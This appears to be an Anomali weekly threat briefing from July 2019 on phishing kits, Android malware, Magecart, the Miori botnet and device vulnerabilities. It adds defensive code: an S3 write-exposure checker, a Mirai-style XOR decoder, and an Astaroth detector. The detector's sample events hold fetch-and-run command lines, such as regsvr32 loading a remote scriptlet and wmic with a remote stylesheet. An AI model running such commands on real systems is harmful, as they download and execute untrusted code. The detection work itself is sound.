July 16, 2019 - Anomali Threat Research

Weekly Threat Briefing: 'Agent Smith' The New Virus to Hit Mobile Devices

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discusses the following threats: <strong>16Shop phishing kit, Agent Smith Android malware, Astaroth malware, Magecart, Miori botnet, </strong>and<strong> Zoom vulnerabilities</strong>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/16shop-now-targets-amazon/" target="_blank"><b>16Shop Now Targets Amazon</b></a> (<i>July 12, 2019</i>)<br/> McAfee Labs has identified a phishing kit named “16Shop” that was first used to trick Apple account holders into entering their payment details. The actors deliver a PDF file whose embedded link redirects the victim to a fake website. According to McAfee, the kit’s author is an individual associated with an Indonesian hacking group named “Indonesian Cyber Army”. The kit has now been adapted to target Amazon customers in the same way, in order to steal account holders’ information.<br/> <a href="https://forum.anomali.com/t/16shop-now-targets-amazon/3977" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.cybermdx.com/vulnerability-research-disclosures/ge-aestiva-and-ge-aespire" target="_blank"><b>Vulnerability Research &amp; Disclosures</b></a> (<i>July 11, 2019</i>)<br/> CyberMDX researchers have disclosed a vulnerability affecting the GE Aestiva and GE Aespire anesthesia delivery devices. 
When the devices are connected to a hospital network so that dosages and vital signs can be documented, an attacker with access to that network can force them to revert to an earlier, insecure version of their communication protocol and then issue commands to them. A successful attack could alter the device’s date and time, change the anesthesia agent type and barometric pressure settings, silence alarms remotely, and alter the gas composition.<br/> <a href="https://forum.anomali.com/t/vulnerability-research-disclosures/3978" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947121">[MITRE ATT&amp;CK] Network Sniffing - T1040</a></p><p><a href="https://www.riskiq.com/blog/labs/magecart-amazon-s3-buckets/" target="_blank"><b>Spray and Pay: Magecart Campaign Breaches Websites En Masse Via Misconfigured Amazon S3 Buckets</b></a> (<i>July 10, 2019</i>)<br/> “Magecart” is the umbrella term for criminal groups that plant payment-card skimmers on websites, often by compromising the third-party suppliers whose scripts those sites load, and RiskIQ has found the activity to be much larger than initially suspected. RiskIQ has identified a Magecart campaign that compromises websites at scale through misconfigured Amazon S3 buckets. 
Once the actors find a bucket that allows public write access, they overwrite the JavaScript files it hosts with copies carrying their skimming code, so that every page loading those scripts sends its visitors’ payment details to the attackers.<br/> <a href="https://forum.anomali.com/t/spray-and-pay-magecart-campaign-breaches-websites-en-masse-via-misconfigured-amazon-s3-buckets/3979" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947137">[MITRE ATT&amp;CK] Supply Chain Compromise - T1195</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a></p><p><a href="https://blog.checkpoint.com/2019/07/10/agent-smith-android-malware-mobile-phone-hack-virus-google/" target="_blank"><b>"Agent Smith:" The New Virus to Hit Mobile Devices</b></a> (<i>July 10, 2019</i>)<br/> Check Point researchers have identified a new Android malware family, dubbed “Agent Smith”, that has infected around 25 million devices, mainly in India, Bangladesh and other Asian countries; it earns its operators money by displaying fraudulent adverts. Infection begins when a user installs a dropper disguised as a free game. The dropper checks the device for widely used apps such as “MXplayer”, “SHAREit” and “WhatsApp”, which it will later target. 
The malware then exploits known Android vulnerabilities to install itself without the user noticing: it extracts the APK (Android Package) of an installed application, injects its malicious modules into it, and replaces the legitimate app with the trojanised copy.<br/> <a href="https://forum.anomali.com/t/agent-smith-the-new-virus-to-hit-mobile-devices/3980" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947205">[MITRE ATT&amp;CK] User Execution - T1204</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/new-miori-variant-uses-unique-protocol-to-communicate-with-cc/" target="_blank"><b>New Miori Variant Uses Unique Protocol to Communicate with C&amp;C</b></a> (<i>July 10, 2019</i>)<br/> “Miori”, a Mirai variant first documented by Trend Micro last year, has reappeared with a new way of talking to its command-and-control (C2) server. Mirai and earlier Miori samples used a binary protocol for C2 communication; the new variant uses a text-based protocol instead. After scanning for and compromising vulnerable hosts, the malware reports each victim’s IP address and working credentials to the C2 server and executes a malicious script. 
Like Mirai, the variant XOR-encrypts its embedded strings, but it uses a different decoding routine, which helps it evade detection tuned to the original.<br/> <a href="https://forum.anomali.com/t/new-miori-variant-uses-unique-protocol-to-communicate-with-c-c/3981" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force - T1110</a> | <a href="https://ui.threatstream.com/ttp/947229">[MITRE ATT&amp;CK] Data Obfuscation - T1001</a> | <a href="https://ui.threatstream.com/ttp/947259">[MITRE ATT&amp;CK] Data Encoding - T1132</a></p><p><a href="https://www.bleepingcomputer.com/news/security/logitech-unifying-receivers-vulnerable-to-key-injection-attacks/" target="_blank"><b>Logitech Unifying Receivers Vulnerable to Key Injection Attacks</b></a> (<i>July 9, 2019</i>)<br/> Security researcher Marcus Mengs has disclosed four new vulnerabilities in Logitech’s Unifying USB receivers, the dongles that let several wireless Logitech devices share a single computer. The flaws stem from outdated receiver firmware. An attacker who gains brief physical access to the receiver can extract the encryption keys of every paired device; with those keys the attacker can later, from a distance, decrypt the victim’s keystrokes and inject arbitrary keystrokes, taking control of the compromised system. 
Logitech has stated that two of the flaws, CVE-2019-13052 and CVE-2019-13053, will not be patched, while CVE-2019-13054 and CVE-2019-13055 will be fixed in a firmware update in August 2019.<br/> <a href="https://forum.anomali.com/t/logitech-unifying-receivers-vulnerable-to-key-injection-attacks/3982" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947121">[MITRE ATT&amp;CK] Network Sniffing - T1040</a></p><p><a href="https://thehackernews.com/2019/07/webcam-hacking-video-conferencing.html" target="_blank"><b>Flaw in Zoom Video Conferencing Software Lets Websites Hijack Mac Webcams</b></a> (<i>July 9, 2019</i>)<br/> Security researcher Jonathan Leitschuh has disclosed a vulnerability, CVE-2019-13450, in the Zoom client for macOS. It abuses the click-to-join feature: a malicious website can force a visitor who has Zoom installed into a meeting, and because the client joins with the webcam enabled by default, the site obtains a live feed from the camera. Uninstalling Zoom does not remove the exposure, because the component behind click-to-join is left behind and silently reinstalls the client without the user’s permission. 
Zoom, whose video-conferencing software has over four million users, has not yet patched the vulnerability.<br/> <a href="https://forum.anomali.com/t/flaw-in-zoom-video-conferencing-software-lets-websites-hijack-mac-webcams/3983" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools - T1219</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947203">[MITRE ATT&amp;CK] Web Service - T1102</a></p><p><a href="https://www.bbc.co.uk/news/business-48905907" target="_blank"><b>British Airways Faces Record £183m Fine For Data Breach</b></a> (<i>July 8, 2019</i>)<br/> British Airways faces a £183 million fine from the UK Information Commissioner’s Office (ICO) over a 2018 breach of its systems. Visitors to the airline’s website were diverted to a fraudulent site that harvested the data of about 500,000 customers, including names, addresses, login credentials, payment card details and travel booking details. The ICO found that British Airways had failed to protect this data against loss, damage or theft; the penalty is the largest since the General Data Protection Regulation (GDPR) came into force in May 2018. 
British Airways says it has found no evidence of fraudulent activity on the affected accounts, although some customers have reported what they believe were fraud attempts.<br/> <a href="https://forum.anomali.com/t/british-airways-faces-record-183m-fine-for-data-breach/3984" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a> | <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service - T1194</a></p><p><a href="https://www.bleepingcomputer.com/news/security/over-90-million-records-leaked-by-chinese-public-security-department/" target="_blank"><b>Over 90 Million Records Leaked by Chinese Public Security Department</b></a> (<i>July 8, 2019</i>)<br/> Security researcher Sanyam Jain discovered two Elasticsearch databases belonging to the Jiangsu Provincial Public Security Department that together exposed over 90 million personal and business records. The databases had been left publicly accessible without authentication, exposing names, gender, birth dates, identity card numbers, location coordinates, business IDs and business types. 
After Jain reported the exposure to the Jiangsu Provincial Public Security Department and to CNCERT/CC, China’s national CERT contacted the database owner, who secured the databases.<br/> <a href="https://forum.anomali.com/t/over-90-million-records-leaked-by-chinese-public-security-department/3985" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1259983">[MITRE PRE-ATT&amp;CK] Identify sensitive personnel information (PRE-T1051)</a> | <a href="https://ui.threatstream.com/ttp/947138">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a></p><p><a href="https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/" target="_blank"><b>Dismantling a Fileless Campaign: Microsoft Defender ATP Next-Gen Protection Exposes Astaroth Attack</b></a> (<i>July 8, 2019</i>)<br/> Microsoft has warned of a fileless campaign distributing the Astaroth information stealer, which harvests credentials and keystrokes for use in fraud or for sale to other criminals. Microsoft Defender ATP detected the campaign: targets receive spearphishing emails with a malicious attachment, and opening it starts a chain in which legitimate Windows tools, including WMI and Regsvr32, download the malicious code and load the final payload directly into memory rather than running it from a dropped executable. 
Because the malicious code never runs from a file of its own on disk, file-based anti-virus scanning has little to inspect, which makes the technique considerably harder to detect.<br/> <a href="https://forum.anomali.com/t/dismantling-a-fileless-campaignl-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/3986" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link - T1192</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&amp;CK] Windows Management Instrumentation - T1047</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/1259909">[MITRE PRE-ATT&amp;CK] Buy domain name (PRE-T1105)</a> | <a href="https://ui.threatstream.com/ttp/947173">[MITRE ATT&amp;CK] Hooking - T1179</a> | <a href="https://ui.threatstream.com/ttp/947176">[MITRE ATT&amp;CK] Regsvr32 - T1117</a> | <a href="https://ui.threatstream.com/ttp/947088">[MITRE ATT&amp;CK] Execution through Module Load - T1129</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a></p></div></div>
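The Magecart story above turns on one misconfiguration: an S3 bucket that lets anyone, or any AWS account, overwrite the JavaScript it serves. The following is an added example written for this briefing, not RiskIQ's or Anomali's tooling. It evaluates a bucket's ACL, its bucket policy and its Block Public Access settings for public write exposure. The inputs are dicts in the shape returned by the AWS APIs GetBucketAcl, GetBucketPolicy and GetPublicAccessBlock, so real boto3 responses can be passed in; the bucket names and configurations in the sample are constructed.

```python
"""Flag S3 bucket configurations that let anonymous users, or any authenticated
AWS account, overwrite objects. Added example, not RiskIQ's or Anomali's code.
Inputs follow the GetBucketAcl / GetBucketPolicy / GetPublicAccessBlock
response shapes; the sample buckets below are constructed.
"""
import fnmatch
import json

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
# ACL permissions that allow creating or replacing objects in the bucket.
ACL_WRITE_PERMISSIONS = {"WRITE", "FULL_CONTROL"}
# Policy actions that allow replacing an object; matched with IAM-style wildcards.
OBJECT_WRITE_ACTIONS = ("s3:PutObject", "s3:PutObjectAcl")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal):
    """Principal "*" or {"AWS": "*"} means every AWS account and anonymous users."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def _allows_object_write(actions):
    """IAM actions are case-insensitive and may use wildcards such as s3:Put* or s3:*."""
    for pattern in _as_list(actions):
        for target in OBJECT_WRITE_ACTIONS:
            if fnmatch.fnmatchcase(target.lower(), pattern.lower()):
                return True
    return False


def acl_public_write(acl):
    """Return the names of the public groups the bucket ACL grants write access to."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        group = PUBLIC_GROUPS.get(grantee.get("URI"))
        if grantee.get("Type") == "Group" and group and grant.get("Permission") in ACL_WRITE_PERMISSIONS:
            hits.append(group)
    return hits


def policy_public_write(policy):
    """Return the Sids of Allow statements that grant object writes to everyone."""
    doc = json.loads(policy) if isinstance(policy, str) else policy
    hits = []
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if _principal_is_public(stmt.get("Principal")) and _allows_object_write(stmt.get("Action", [])):
            hits.append(stmt.get("Sid", "<no Sid>"))
    return hits


def public_block_protects(pab):
    """True when Block Public Access neutralises existing public ACLs and public policies."""
    cfg = (pab or {}).get("PublicAccessBlockConfiguration", {})
    return bool(cfg.get("IgnorePublicAcls")) and bool(cfg.get("RestrictPublicBuckets"))


def assess_bucket(acl, policy=None, pab=None):
    """Combine the three checks into a list of human-readable findings."""
    findings = [f"ACL grants write to {group}" for group in acl_public_write(acl)]
    if policy:
        findings += [f"policy statement {sid} allows public object writes" for sid in policy_public_write(policy)]
    if findings and public_block_protects(pab):
        findings = [f + " (mitigated by Block Public Access)" for f in findings]
    return findings


# Constructed samples: a bucket whose ACL and policy both allow public writes,
# and a second bucket with the same bad policy but Block Public Access enabled.
EXPOSED_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}, "Permission": "WRITE"},
]}
EXPOSED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-static-assets/*"},
    {"Sid": "OpenUpload", "Effect": "Allow", "Principal": {"AWS": "*"}, "Action": ["s3:Put*"],
     "Resource": "arn:aws:s3:::example-static-assets/*"},
]})
OWNER_ONLY_ACL = {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner"}, "Permission": "FULL_CONTROL"}]}
LOCKED_DOWN_PAB = {"PublicAccessBlockConfiguration": {
    "BlockPublicAcls": True, "IgnorePublicAcls": True, "BlockPublicPolicy": True, "RestrictPublicBuckets": True}}

if __name__ == "__main__":
    for name, acl, policy, pab in [("example-static-assets", EXPOSED_ACL, EXPOSED_POLICY, None),
                                   ("example-locked", OWNER_ONLY_ACL, EXPOSED_POLICY, LOCKED_DOWN_PAB)]:
        for finding in assess_bucket(acl, policy, pab) or ["no public write exposure"]:
            print(f"{name}: {finding}")
```

Note that a public READ grant is deliberately not flagged: static-asset buckets are often meant to be world-readable, and what the skimmers needed was write. The AuthenticatedUsers group is treated as public because it covers every AWS account in existence, not just the bucket owner's.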
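The Miori write-up above notes that the variant keeps Mirai's XOR string obfuscation but changes the decoding details. As an added example, not code from Trend Micro, Anomali or the malware, the block below implements the Mirai-style scheme and shows how an analyst recovers the key when a variant has changed it. What is taken from the leaked Mirai source is the scheme itself (each table string XORed with the four bytes of the 32-bit key 0xDEADBEEF, which collapses to a single byte) and the obfuscated placeholder C2 domain entry from its table.c; the variant key 0x5A and the variant string table are constructed for the demonstration.

```python
"""Decode Mirai-style XOR-obfuscated string tables and recover a changed key.
Added example; not Trend Micro's, Anomali's or the malware's own code.
Known from the leaked Mirai source: strings are XORed byte by byte with the
four bytes of a 32-bit key (0xDEADBEEF), equivalent to one folded byte.
The variant key and variant table below are constructed.
"""
import string

MIRAI_TABLE_KEY = 0xDEADBEEF
# Obfuscated TABLE_CNC_DOMAIN entry as it appears in the leaked Mirai source (table.c).
MIRAI_CNC_ENTRY = bytes.fromhex("414c410c414a434c45474f470c414d4f22")

# Bytes that may legitimately appear in a C string table: printable ASCII plus NUL.
TEXT_BYTES = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
ALNUM_BYTES = set((string.ascii_letters + string.digits).encode())


def fold_key(table_key):
    """Collapse Mirai's 32-bit table key into the single XOR byte it amounts to."""
    return (table_key ^ (table_key >> 8) ^ (table_key >> 16) ^ (table_key >> 24)) & 0xFF


def xor_bytes(data, key_byte):
    """XOR is its own inverse, so one routine both obfuscates and deobfuscates."""
    return bytes(b ^ key_byte for b in data)


def looks_like_text(data):
    return all(b in TEXT_BYTES or b == 0x00 for b in data)


def text_score(data):
    """Rank candidate plaintexts: letters and digits score highest, punctuation and
    NUL terminators are tolerated, anything else is penalised heavily."""
    score = 0
    for b in data:
        if b in ALNUM_BYTES:
            score += 2
        elif b in TEXT_BYTES or b == 0x00:
            score += 1
        else:
            score -= 5
    return score


def recover_key(blob):
    """Recover the single XOR byte protecting a table blob, or None if no key yields text.

    NUL-terminated entries give the key away: the obfuscated terminator is 0x00 ^ key,
    so the last byte of the blob *is* the key. That guess is tried first. A blob with
    no terminator falls back to scoring all 256 keys; for very short strings several
    keys can score equally well, which is why the terminator trick is preferred."""
    if not blob:
        return None
    guess = blob[-1]
    decoded = xor_bytes(blob, guess)
    if looks_like_text(decoded):
        return guess, decoded
    best = max(range(256), key=lambda k: text_score(xor_bytes(blob, k)))
    decoded = xor_bytes(blob, best)
    return (best, decoded) if looks_like_text(decoded) else None


def split_c_strings(data):
    """Mirai-style tables store NUL-terminated entries back to back."""
    return [entry.decode("ascii") for entry in data.split(b"\x00") if entry]


# Constructed: a variant author kept the scheme but changed the key; the table holds
# a C2 endpoint in TEST-NET-2 space, a shell path and a login name.
VARIANT_KEY = 0x5A
VARIANT_TABLE = b"".join(xor_bytes(s + b"\x00", VARIANT_KEY)
                         for s in (b"198.51.100.23:6667", b"/bin/busybox", b"admin"))

if __name__ == "__main__":
    folded = fold_key(MIRAI_TABLE_KEY)
    print(f"Mirai key folds to 0x{folded:02x}: {xor_bytes(MIRAI_CNC_ENTRY, folded)!r}")
    key, table = recover_key(VARIANT_TABLE)
    print(f"variant key recovered as 0x{key:02x}: {split_c_strings(table)}")
```

The practical lesson is that a changed XOR key buys the variant very little against an analyst: once the table's NUL terminators are located in the binary, every entry's last byte reveals the key, and the decoded C2 address and credential strings fall out without any reverse engineering of the decoding routine.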

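The Astaroth summary above describes a chain of legitimate Windows tools, WMI and Regsvr32 among them, that fetches and decodes the payload and runs it in memory, so the detection opportunity is in process-creation telemetry rather than on disk. The block below is an added example, not Microsoft's or Anomali's detection logic. It applies three command-line rules keyed to the ATT&CK techniques listed for the story (T1047, T1117, T1140) and correlates hits per host so that a benign administrator running wmic /format:list does not alert while the three-stage chain does. Events are dicts with the fields a Sysmon Event ID 1 or Windows 4688 record provides; the sample events, host names, URLs and file names are constructed placeholders.

```python
"""Flag living-off-the-land process chains of the kind described for Astaroth:
WMI abuse (T1047), Regsvr32 scriptlet loading (T1117) and payload decoding (T1140).
Added example, not Microsoft's or Anomali's logic; sample events are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (technique, description, image pattern, command-line pattern); matched case-insensitively.
RULES = [
    ("T1047", "WMIC rendering output through a remote or file-path XSL stylesheet",
     r"\\wmic\.exe$",
     r'/format:\s*"?(?:https?://|\\\\|[a-z]:\\|[^\s"]*\.xsl)'),
    ("T1117", "Regsvr32 loading a scriptlet via scrobj.dll or a URL",
     r"\\regsvr32\.exe$",
     r'(?:/i:\s*"?https?://|scrobj\.dll)'),
    ("T1140", "Certutil decoding or downloading a payload",
     r"\\certutil\.exe$",
     r"\s[-/](?:decode|urlcache)\b"),
]


def match_rules(event):
    """Return the ATT&CK technique IDs whose image and command-line patterns both match."""
    return [technique for technique, _, image_re, cmd_re in RULES
            if re.search(image_re, event["image"], re.I) and re.search(cmd_re, event["cmdline"], re.I)]


def detect_chains(events, window=timedelta(minutes=10)):
    """Group rule hits per host and flag a chain when two or more distinct techniques
    fire within the window. A single first-to-last span check is enough for a demo;
    production logic would use a sliding window and parent/child relationships."""
    hits_by_host = defaultdict(list)
    for event in events:
        for technique in match_rules(event):
            hits_by_host[event["host"]].append(
                (datetime.fromisoformat(event["time"]), technique, event["cmdline"]))
    alerts = []
    for host, hits in hits_by_host.items():
        hits.sort()
        techniques = sorted({technique for _, technique, _ in hits})
        span = hits[-1][0] - hits[0][0]
        alerts.append({
            "host": host,
            "first_seen": hits[0][0].isoformat(),
            "techniques": techniques,
            "chain": len(techniques) >= 2 and span <= window,
            "commands": [cmdline for _, _, cmdline in hits],
        })
    return alerts


# Constructed telemetry: ws01 shows the three-stage chain, ws02 shows ordinary
# administrative use of the same binaries that must not alert.
SAMPLE_EVENTS = [
    {"host": "ws01", "time": "2019-07-08T09:14:02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic os get /format:"https://cdn.example.test/v.xsl"'},
    {"host": "ws01", "time": "2019-07-08T09:14:09", "parent": r"C:\Windows\System32\wbem\WMIC.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\Users\Public\stage.b64 C:\Users\Public\stage.dll"},
    {"host": "ws01", "time": "2019-07-08T09:14:12", "parent": r"C:\Windows\System32\wbem\WMIC.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /u /i:https://cdn.example.test/stage2.sct scrobj.dll"},
    {"host": "ws02", "time": "2019-07-08T10:02:41", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic os get caption,version /format:list"},
    {"host": "ws02", "time": "2019-07-08T10:05:10", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
]

if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert)
```

The WMIC rule keys on a /format: argument that names a URL or a file path rather than one of the built-in format keywords, and the Regsvr32 rule on the scriptlet-loading form rather than plain DLL registration; both binaries are used legitimately every day, so the per-host correlation, not any single rule, is what makes the alert actionable.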